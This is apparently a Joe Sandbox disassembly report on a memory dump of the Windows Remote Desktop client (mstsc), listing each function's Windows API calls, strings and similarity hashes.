                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleInitializeLibraryMessageModuleProcTraceVersion
                                                                                                                                                                                    • String ID: (null)$Failed DisplayContents on Help Pane$Failed to call CoInitialize$Failed to cocreate CLSID_HxHelpPane$mstsc.chm
                                                                                                                                                                                    • API String ID: 1070927090-1823579970
                                                                                                                                                                                    • Opcode ID: 5992b032369e490f73fa05b0e06235668d14642fa813297739bc71deb62d75e3
                                                                                                                                                                                    • Instruction ID: 7972893d96ea2fde0ba6a761a09aca8efae950dc3bddd5ae32351dcf2fad4452
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5992b032369e490f73fa05b0e06235668d14642fa813297739bc71deb62d75e3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E51E931A04328AFCB25CF24EC49FBA7BA9AB49310F048199F505A72A5C778CE80DF51
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00950C33
                                                                                                                                                                                    • IsWindow.USER32(?), ref: 00950C3E
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 00950C4D
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00950C62
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 00950C6A
                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00950C74
                                                                                                                                                                                    • PtInRect.USER32(00000000), ref: 00950C8C
                                                                                                                                                                                    • PtInRect.USER32(00000000,?,-00000001), ref: 00950C9A
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00950D03
                                                                                                                                                                                    • CopyRect.USER32(00000000,?), ref: 00950D4E
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,?,00000000,00000000,00000015), ref: 00950E12
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Rect$Window$System$Metrics$CopyIconicInfoParameters
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3517074850-0
                                                                                                                                                                                    • Opcode ID: 1ba1b55905026e8d618bf08c9155dc7f157bdac89f98866abe2ef865174eab8d
                                                                                                                                                                                    • Instruction ID: 3e809ee353de8c1d0d2095d611b7a95699903ebb190ce02f652b5f18102f8997
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ba1b55905026e8d618bf08c9155dc7f157bdac89f98866abe2ef865174eab8d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2761AD72A04309AFCB10DFA9DD85FEE7BB9EB88305F140418E900B7261CB31EC499B60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 00918904
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00918915
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091891F
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • IsZoomed.USER32(?), ref: 00918A26
                                                                                                                                                                                    • SetWindowPlacement.USER32 ref: 00918A6A
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918A74
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 00918AE3
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000205), ref: 00918BC4
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00918C49
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00918C77
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ErrorLastPlacement$AddressClientFreeHandleIconicLibraryMessageModuleMoveProcRectTraceZoomed
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1784869082-0
                                                                                                                                                                                    • Opcode ID: 950fce831eec8531fb410be2ce1eb79bcafc933422fe5593ecfdd420d0b29d1b
                                                                                                                                                                                    • Instruction ID: a6e41228c269e551676fbbfb0c44118c8fa82a03bc7cd3fa484bacaa448158ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 950fce831eec8531fb410be2ce1eb79bcafc933422fe5593ecfdd420d0b29d1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0C16E71B04348AFDB25DFA0C889FAE7BAAAF44304F184059F905AB1A5CB75DC81EF50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00000003), ref: 0094210F
                                                                                                                                                                                    • PathAppendW.SHLWAPI(?,?), ref: 0094214C
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009421A0
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • FindClose.KERNEL32(00000002,0091396B,00000000,00000000), ref: 00942436
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindPath$AddressAppendAttributesCloseFreeHandleLibraryMessageModuleNameProcTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3301147593-0
                                                                                                                                                                                    • Opcode ID: 9ac6e8c41463407c275e5bb1e3fab5f03e9017bbd7ce1b0679a894b2bfa9a55c
                                                                                                                                                                                    • Instruction ID: 72011bab7137f4a159bebcdc63ecdd138e896b899ec43830df8e9a36519f9270
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ac6e8c41463407c275e5bb1e3fab5f03e9017bbd7ce1b0679a894b2bfa9a55c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D591E171A04208ABCB25DF60CC88FA677BAFF59314F940499F914A71B2D7B1DD90DB11
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptMsgOpenToDecode.CRYPT32(00010001,00000004,00000000,00000000,00000000,00000000), ref: 009579CF
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 009579F9
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 00957A28
                                                                                                                                                                                    • CryptMsgUpdate.CRYPT32(00000000,?,?,00000001), ref: 00957A35
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 00957A5D
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 00957A8C
                                                                                                                                                                                    • CertOpenStore.CRYPT32(00000001,00010001,00000000,00000000,00000000), ref: 00957A96
                                                                                                                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 00957A9F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$Crypt$Open$CertCloseDecodeStoreUpdate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3172839031-0
                                                                                                                                                                                    • Opcode ID: 1a8a257950ac052f971a912f2fbeff9cd3249024a5b7e1bddacbbeea385b8690
                                                                                                                                                                                    • Instruction ID: f76589356b4fcd9edaeb6327a3dc607502f1264035d7e103658c45abe7651965
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a8a257950ac052f971a912f2fbeff9cd3249024a5b7e1bddacbbeea385b8690
                                                                                                                                                                                    • Instruction Fuzzy Hash: B221377122C3057FE7259BA6AC49F7B7E9DEB453A1F110049FD40D71A2CAA4CE44EB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnableItemMenu$IconicZoomed
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1707219219-0
                                                                                                                                                                                    • Opcode ID: 8e9585f484e47fb1aa808c443445d9d4f1e4d328184eb4dd8c0675aec421adea
                                                                                                                                                                                    • Instruction ID: 9337203e069cdb58373eb1bd42f67094404164ba480f39fe7705ab7543ad6951
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9585f484e47fb1aa808c443445d9d4f1e4d328184eb4dd8c0675aec421adea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08218C71710209FFEB208F61DC49FAA7BA9FF84750F108169F5169A0A0CBB2AD41EB50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,0096391A), ref: 00963B93
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,0096391A), ref: 00963C61
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$AddressCryptDataHandleLibraryLocalMessageModuleProcProtectTrace
                                                                                                                                                                                    • String ID: PBYTE$StringCbLength failed!
                                                                                                                                                                                    • API String ID: 4120179676-4256456346
                                                                                                                                                                                    • Opcode ID: 94082500bfdda174b7f6e56d697d100189e7ed63646600c55e8566c56366ab10
                                                                                                                                                                                    • Instruction ID: 42e3ae5c327170b81ae92b4e1ac0a75586e969b255780d0538efc7c48c60b1bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94082500bfdda174b7f6e56d697d100189e7ed63646600c55e8566c56366ab10
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77410371A08349AFDB248F98D849FBA7BA9EF09310F148059F944F72A1C778CA50DB84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(shell32.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00946433,?,00000001), ref: 00943B0D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID,?,?,?,?,?,?,?,?,?,00946433,?,00000001,?,00000000), ref: 00943B23
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00946433,?,00000001,?,00000000,00000000), ref: 00943BFB
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • shell32.dll, xrefs: 00943B03
                                                                                                                                                                                    • Microsoft.Windows.RemoteDesktop, xrefs: 00943AF9
                                                                                                                                                                                    • SetCurrentProcessExplicitAppUserModelID, xrefs: 00943B1D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                                                                                                    • String ID: Microsoft.Windows.RemoteDesktop$SetCurrentProcessExplicitAppUserModelID$shell32.dll
                                                                                                                                                                                    • API String ID: 2109255295-1123326357
                                                                                                                                                                                    • Opcode ID: f06d6ba57914c4327d702f3192a925726a1427f81676889ce778c3eb27c1ee77
                                                                                                                                                                                    • Instruction ID: fa71faac96b44f0cf84be4c3ac3dd8eb071520df7dafd13c14f81378663b8431
                                                                                                                                                                                    • Opcode Fuzzy Hash: f06d6ba57914c4327d702f3192a925726a1427f81676889ce778c3eb27c1ee77
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2410831A083446FD72DDFB4989AF653BA9EB49314F14404CF901EB1A2C6B1DE81EF55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RpcStringBindingComposeW.RPCRT4(484809d6-4239-471b-b5bc-61df8c23ac48,ncacn_np,00000006,00000006,Security=Impersonation Dynamic False,?), ref: 009604A5
                                                                                                                                                                                    • RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 00960505
                                                                                                                                                                                    • RpcStringFreeW.RPCRT4(00000000,?,00960651,00000006,\pipe\SessEnvPublicRpc,?,?,00000000,?,00000000,?,?,?,009605C2,?,?), ref: 00960573
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BindingString$ComposeFreeFrom
                                                                                                                                                                                    • String ID: 484809d6-4239-471b-b5bc-61df8c23ac48$Security=Impersonation Dynamic False$ncacn_np
                                                                                                                                                                                    • API String ID: 465755213-2085260422
                                                                                                                                                                                    • Opcode ID: d61ea2406f3a7ed1d38137c9c65a75720a4fbb9d0ced6dc1a29aab918eb06c86
                                                                                                                                                                                    • Instruction ID: f18285e9c61b075e8529bf2670a00d865cd97e304a3faa1f9f1ab95887a45fdd
                                                                                                                                                                                    • Opcode Fuzzy Hash: d61ea2406f3a7ed1d38137c9c65a75720a4fbb9d0ced6dc1a29aab918eb06c86
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0310172A14304AFDB26CF5A9988F773AA9EBC4310F25045DF94697262D675CC00EF50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,00000000,00000000,00003AB3), ref: 009128CF
                                                                                                                                                                                    • FindResourceExW.KERNEL32(00000000,?,?,00000000), ref: 009128EC
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00912999
                                                                                                                                                                                      • Part of subcall function 0091142A: GetLastError.KERNEL32(00910B13), ref: 0091142A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$ErrorFindFreeLastLoadResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3418355812-0
                                                                                                                                                                                    • Opcode ID: a929dfb8db89837fa206279e2039adb1e3d0434bfd89bf6f17b3b99f4ef4e3fa
                                                                                                                                                                                    • Instruction ID: ad81cf28f183604b8eb7fb4aa681947cbd45bdd6a21fa6c8d49eab38472b5a23
                                                                                                                                                                                    • Opcode Fuzzy Hash: a929dfb8db89837fa206279e2039adb1e3d0434bfd89bf6f17b3b99f4ef4e3fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8131C9B0B0421DABDB21AB54CC44BFE77B8EF84310F0084B9FA15A7240DB709ED19B94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 0094D40E
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0094D46B
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocBinaryCryptFreeHandleLibraryLocalMessageModuleProcStringTrace
                                                                                                                                                                                    • String ID: szEncoded
                                                                                                                                                                                    • API String ID: 73248781-2519130501
                                                                                                                                                                                    • Opcode ID: 2a79812b748e1a1352daaa28be1b6026128a3577b3c901828a804de1512f3d75
                                                                                                                                                                                    • Instruction ID: 345214f735df2b6f88a7dae85aa4ae7041786635469574b9d8a3e759d546d631
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a79812b748e1a1352daaa28be1b6026128a3577b3c901828a804de1512f3d75
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5741E075219304AFDB2A8F18EC49F2A3BAAEB89318F00445DF945DB2A6CB74DC40DB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0095B0D2
                                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,00000010), ref: 0095B12F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095B157
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0095B17A
                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0095B19E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$AddressComputerFreeHandleLibraryMessageModuleNameProcTrace_wcsnicmpwcschr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 940169717-0
                                                                                                                                                                                    • Opcode ID: e329735cbbf477a401e9b6fa2d326b5d1b8e802bb6e2aa419b627db6793db81c
                                                                                                                                                                                    • Instruction ID: b5a8c6d87a0f4ead0202442e33ea5c53212db5b59ed38e91ee6236a4d3576890
                                                                                                                                                                                    • Opcode Fuzzy Hash: e329735cbbf477a401e9b6fa2d326b5d1b8e802bb6e2aa419b627db6793db81c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D0314872618708AFD724CF65DC65BAB7BA8EB44311F00002EED00E7291DBB5DC449F91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptDecodeObject.CRYPT32(00000000,00000024,00000000,?,00000000,00000000,?), ref: 009640D4
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00964328,?,?,00000000,00000000,?,?,00000000), ref: 009640E5
                                                                                                                                                                                    • CryptDecodeObject.CRYPT32(00000000,00000024,00000000,?,00000000,00000000,?), ref: 009640FE
                                                                                                                                                                                    • LocalFree.KERNEL32(00964328,?,00964328,?,?,00000000,00000000,?,?,00000000), ref: 0096410A
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00964328,?,?,00000000,00000000,?,?,00000000), ref: 00964113
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CryptDecodeLocalObject$AllocErrorFreeLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1386893860-0
                                                                                                                                                                                    • Opcode ID: c0e642117cd3f9973a36a11f36cc4dafd45ca80346ba26b5935881ec46ebc992
                                                                                                                                                                                    • Instruction ID: cb770779dfc4ed5fcc151446d757fa6f3af3a3a40ddf4edf106dceac0d08868d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0e642117cd3f9973a36a11f36cc4dafd45ca80346ba26b5935881ec46ebc992
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29012271308206BBEB201FA1DC09F677BACEF36796F114019FA80D50A0E7B4C880EB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 00918829
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00918841
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091884B
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressErrorFreeHandleIconicLastLibraryMessageModulePlacementProcTraceWindow
• String ID: ,
• API String ID: 3754642993-3772416878
APIs
• IsWindowVisible.USER32 ref: 0091C149
• IsIconic.USER32(?), ref: 0091C176
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
Similarity
• API ID: AddressFreeHandleIconicLibraryMessageModuleProcTraceVisibleWindow
• String ID: ShowShutdownDialog
• API String ID: 285738821-2398949525
APIs
• GetSystemTime.KERNEL32(0090B55C,?,?,?,?,009643E7,0090B55C,?,?,?,00000000), ref: 0096416D
• SystemTimeToFileTime.KERNEL32(0090B55C,?,?,009643E7,0090B55C,?,?,?,00000000), ref: 0096417B
• GetLastError.KERNEL32(?,009643E7,0090B55C,?,?,?,00000000), ref: 00964185
Similarity
• API ID: Time$System$ErrorFileLast
• String ID:
• API String ID: 2409880431-0
APIs
• CoCreateInstance.OLE32(009011B4,00000000,00000001,00901194,?), ref: 0094B9DF
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
